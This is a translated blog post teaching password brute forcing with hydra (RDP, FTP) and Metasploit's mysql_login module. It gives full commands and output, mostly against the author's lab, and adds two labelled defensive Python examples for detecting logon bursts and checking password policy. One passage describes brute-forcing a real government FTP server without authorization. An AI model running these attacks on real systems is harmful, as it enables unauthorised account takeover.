A brief look at the importance of brute forcing in penetration testing.


First published on ichunqiu. I posted it once on the forum, now posting it again here on Zhihu, heh.
A brief look at the uses of brute forcing in penetration testing - Web Security - ichunqiu community: share your skills and add a little warmth to security

In security, the biggest vulnerability is the password. This article talks about the uses of brute forcing in penetration testing.
Some of you, when you can't find an injection point, a stored XSS or any of the other usual vulnerabilities during a pentest, may choose to give up. But have you considered that brute forcing also has enormous uses in penetration testing?
Last time I posted several write-ups that were all successful penetrations after brute forcing with Burp, posted under the team account; search for the W3bSafe team on the forum, ahem.
Test environment:
Kali
Windows 2003 host


For brute-forcing back-end usernames and passwords, the best tool on Windows is without doubt Burp, but on Linux there is a particularly handy brute-force tool: hydra.

The official description reads:
"One of the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add; beside that, it is flexible and very fast."

Hydra was tested on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.

Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Parameter description
root@xaiSec:~# hydra -help
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]] | [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack. Supported protocols: afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
  OPT       some service modules support additional input (-U for module help)
Use the HYDRA_PROXY_HTTP / HYDRA_PROXY and HYDRA_PROXY_AUTH environment variables for a proxy setup.

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.

Examples:
  hydra -l john -p doe 192.168.0.1 ftp
  hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN
  hydra -l admin -P pass.txt http-proxy://192.168.0.1
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5

Of course, let's first try brute-forcing a server.
We'll treat 192.168.0.128, the Windows 2003 host, as the server.


The PHP environment is, of course, the one I'm running on the 2003 host.

192.168.0.128/ is the site we want to penetrate.
Next comes reconnaissance. First, pretend we don't know this site's IP:
we ping it and learn that the site's IP is 192.168.0.128.


Next, let's brute-force it with Hydra.
Here I threw together a password wordlist and put it under the root directory. First, let me explain how to use hydra when the username is already known to be administrator.
Username: administrator

Of course, the brute force is fast.

The output is as follows:

root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator  -P /root/pass  -V 
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-19 21:54:27
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 18 login tries (l:1/p:18), ~1 try per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 18 [child 0]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 18 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 18 [child 2]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 18 [child 3]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 18 [child 4]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 18 [child 5]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 18 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 18 [child 7]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 18 [child 8]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 18 [child 9]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 18 [child 10]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 18 [child 11]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 18 [child 12]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 18 [child 13]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 18 [child 14]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 18 [child 14]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 20 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 20 [child 11]
[3389][rdp] host: 192.168.0.128   login: administrator   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-19 21:54:32

Look at the red line at the very bottom:

[3389][rdp] host: 192.168.0.128   login: administrator   password: admin

The username is administrator and the password is admin.
Next, let's go over the parameters.

root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator  -P /root/pass  -V

hydra IP service-protocol, then -l gives the username, -P the wordlist path, -V verbose output.
With an uppercase -L we instead give the path of our username wordlist (for when we don't know the username).
For example:

hydra 192.168.0.128 rdp -L /root/user -P /root/pass  -V

The output is as follows:

root@xaiSec:~# hydra 192.168.0.128 rdp -L /root/user -P /root/pass  -V
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-19 22:03:58
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 234 login tries (l:13/p:18), ~14 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 234 [child 0]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 234 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 234 [child 2]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 234 [child 3]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 234 [child 4]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 234 [child 5]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 234 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 234 [child 7]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 234 [child 8]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 234 [child 9]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 234 [child 10]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 234 [child 11]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 234 [child 12]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 234 [child 13]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 234 [child 14]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 234 [child 14]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 235 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 235 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 18 of 235 [child 6]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 19 of 235 [child 7]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 20 of 235 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 21 of 235 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 21 of 235 [child 6]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 21 of 235 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 21 of 235 [child 7]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 236 [child 5]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 24 of 240 [child 1]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 1]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 26 of 242 [child 9]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 11]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 9]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 243 [child 11]
[3389][rdp] host: 192.168.0.128   login: administrator   password: admin
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 28 of 244 [child 0]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 244 [child 8]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 29 of 244 [child 0]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 245 [child 8]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 30 of 246 [child 10]
[ATTEMPT] target 192.168.0.128 - login "fhfahreyrey" - pass "admin" - 37 of 246 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 37 of 248 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "admin" - 55 of 248 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "111" - 56 of 250 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "22" - 57 of 251 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 58 of 252 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 59 of 253 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 60 of 254 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 61 of 255 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 62 of 256 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 63 of 257 [child 4]
[ERROR] Too many connect errors to target, disabling rdp://192.168.0.128:3389
0 of 1 target successfully completed, 1 valid password found
[INFO] Writing restore file because 1 server scan could not be completed
[ERROR] 1 target was disabled because of too many errors
Hydra (http://www.thc.org/thc-hydra) finished at 2017-03-19 22:04:04

Connected successfully.

Heh, it's only a local test~
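The two hydra runs above look, from the server's side, like a burst of failed RDP logons from one source (hydra's default is 16 parallel tasks) followed by one success. The following Python is an added example of the detection logic a defender would run over Windows logon events; it is not code from the original post. The event format is a constructed, simplified one-line-per-event form (timestamp, event ID, logon type, account, source IP) rather than a real EVTX or CSV export, and the threshold and window are assumptions.

```python
"""Flag sources that generate a burst of failed RDP logons, and note whether a
successful logon from the same source follows (the sign that guessing worked).

Constructed format, one event per line:
    <ISO timestamp> <EventID> <LogonType> <account> <source_ip>
4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = "4625"
SUCCESS_LOGON = "4624"
RDP_LOGON_TYPES = {"10", "3"}   # RemoteInteractive; NLA-fronted RDP also logs type 3

# Constructed sample: 16 failures within four seconds from one source, then a
# success from that source, plus unrelated noise that must not be flagged.
SAMPLE_EVENTS = "\n".join(
    [f"2017-03-19T21:54:{27 + i // 4:02d} 4625 10 administrator 192.168.0.1" for i in range(16)]
    + [
        "2017-03-19T21:54:32 4624 10 administrator 192.168.0.1",
        "2017-03-19T21:54:40 4625 10 bob 10.0.0.5",
        "2017-03-19T21:55:10 4625 2 alice 10.0.0.5",   # type 2 = local console, ignored
    ]
)


def parse_events(text):
    """Parse the simplified event lines into tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, src = line.split()
        events.append((datetime.fromisoformat(ts), event_id, logon_type, account, src))
    events.sort(key=lambda e: e[0])
    return events


def detect_bruteforce(events, threshold=10, window=timedelta(seconds=60)):
    """Return {source_ip: finding} for every source with at least `threshold`
    failed RDP logons inside a sliding `window`. A finding records the burst and,
    if one occurs afterwards, the first successful logon from that source."""
    recent = defaultdict(deque)   # source_ip -> deque of (timestamp, account) failures
    findings = {}
    for ts, event_id, logon_type, account, src in events:
        if logon_type not in RDP_LOGON_TYPES:
            continue
        if event_id == FAILED_LOGON:
            q = recent[src]
            q.append((ts, account))
            while q and ts - q[0][0] > window:      # drop failures outside the window
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(src, {"first_seen": q[0][0], "failures": 0,
                                              "accounts": set(), "success_after": None})
                f["failures"] = len(q)
                f["accounts"].update(a for _, a in q)
                f["last_seen"] = ts
        elif event_id == SUCCESS_LOGON and src in findings:
            f = findings[src]
            if f["success_after"] is None:
                f["success_after"] = (ts, account)   # burst followed by success: escalate
    return findings


def describe(findings):
    """Render findings as one alert line per source."""
    lines = []
    for src, f in findings.items():
        msg = (f"{src}: {f['failures']} failed RDP logons between {f['first_seen'].time()} "
               f"and {f['last_seen'].time()} against {sorted(f['accounts'])}")
        if f["success_after"]:
            ts, account = f["success_after"]
            msg += f"; SUCCESSFUL logon as {account!r} at {ts.time()} after the burst"
        lines.append(msg)
    return lines


if __name__ == "__main__":
    for line in describe(detect_bruteforce(parse_events(SAMPLE_EVENTS))):
        print(line)
```

The sliding window is what separates a guessing burst from an ordinary user mistyping a password a few times; a success that lands after a flagged burst is the event worth paging on, and on the prevention side the same host would normally be protected by an account-lockout policy and by not exposing 3389 directly.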

Brute-forcing a virtual host

hydra IP ftp -L /root/user -P /root/pass -V
Here I used a gov site for the test, heh; it has already been submitted to Vulbox (漏洞盒子).

We can see that no matter what password we use, it logs in: the virtual host can be accessed without authorization. Let's log in.

This is scary: we really got in.

Of course, Metasploit also has many brute-force modules.
Brute-forcing the database on 3306; I've already set up a MySQL database on my Kali box.

Configure Metasploit:

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) > set USERNAME test
USERNAME => test
msf auxiliary(mysql_login) > set PASS_FILE /root/pass
PASS_FILE => /root/pass
msf auxiliary(mysql_login) > run
 
[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31
[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:'test' with password:''
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'test' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Explanation:

use auxiliary/scanner/mysql/mysql_login  // load the module
set RHOSTS 127.0.0.1  // set the database address; it's my own machine, so of course 127.0.0.1
set USERNAME test // I set the MySQL user to test; if you don't know it, you can set USER_FILE <wordlist path> and brute-force the username too
set PASS_FILE /root/pass // use the wordlist at /root/pass
run // start brute-forcing
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'test' : ''

In this line the password is empty.

The connection succeeds as follows:

root@xaiSec:~# mysql -u test -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.31-0+wheezy1 (Debian)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

Because there is no password, we just hit Enter at the password prompt.

I remember there was a site called caimima that exploited weaknesses in human nature; it seems it can't be reached anymore, ahem.
Of course, brute forcing combined with social engineering gives a pentester wings.


Also, folks: are your server passwords weak? If so, I suggest using letters, digits, symbols and so on~
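Both credentials the post recovered (administrator/admin over RDP and the MySQL test account with an empty password) would be caught by the kind of password policy the closing advice is asking for. The Python below is an added example of such a policy check, not code from the original post; the thresholds (12 characters, three of four character classes), the denylist and the sample accounts are constructed assumptions chosen for illustration, and a real deployment would load a breached-password list instead of the small set here.

```python
"""Password-policy audit: report why a credential fails the policy."""
import string

# Constructed denylist: values from the post's wordlist plus a few classics.
COMMON_PASSWORDS = {"admin", "password", "123456", "111", "22", "2", "2222", "root", "test"}


def character_classes(pw):
    """Count how many of lower/upper/digit/punctuation classes appear in pw."""
    return sum([
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(c in string.punctuation for c in pw),
    ])


def check_password(pw, username=None, min_length=12, min_classes=3):
    """Return the list of policy violations; an empty list means the password passes."""
    if pw == "":
        return ["empty password"]                       # the MySQL 'test' account case
    problems = []
    if len(pw) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if character_classes(pw) < min_classes:
        problems.append(f"fewer than {min_classes} character classes")
    if len(set(pw)) <= 2:
        problems.append("repetitive (two or fewer distinct characters)")   # e.g. 333333333333
    if pw.lower() in COMMON_PASSWORDS:
        problems.append("in the common-password denylist")
    if username and (username.lower() in pw.lower() or pw.lower() in username.lower()):
        problems.append("derived from the username")    # 'admin' vs 'administrator'
    return problems


def audit_accounts(accounts):
    """accounts: iterable of (username, password). Returns {username: violations}
    for the accounts that fail the policy."""
    report = {}
    for username, pw in accounts:
        problems = check_password(pw, username)
        if problems:
            report[username] = problems
    return report


# Constructed sample: the two credentials the post recovered, one long but weak
# value from the wordlist, and one that passes the policy.
SAMPLE_ACCOUNTS = [
    ("administrator", "admin"),
    ("test", ""),
    ("bob", "333333333333"),
    ("alice", "Tr0ub4dor&3xyz!"),
]


if __name__ == "__main__":
    for user, problems in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{user}: " + "; ".join(problems))
```

Length and a denylist do most of the work here; the character-class rule alone would still accept "333333333333", which is why the repetition and denylist checks sit beside it.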


-- W3bSafe team member 小爱_Joker

Edited on 2017-03-20
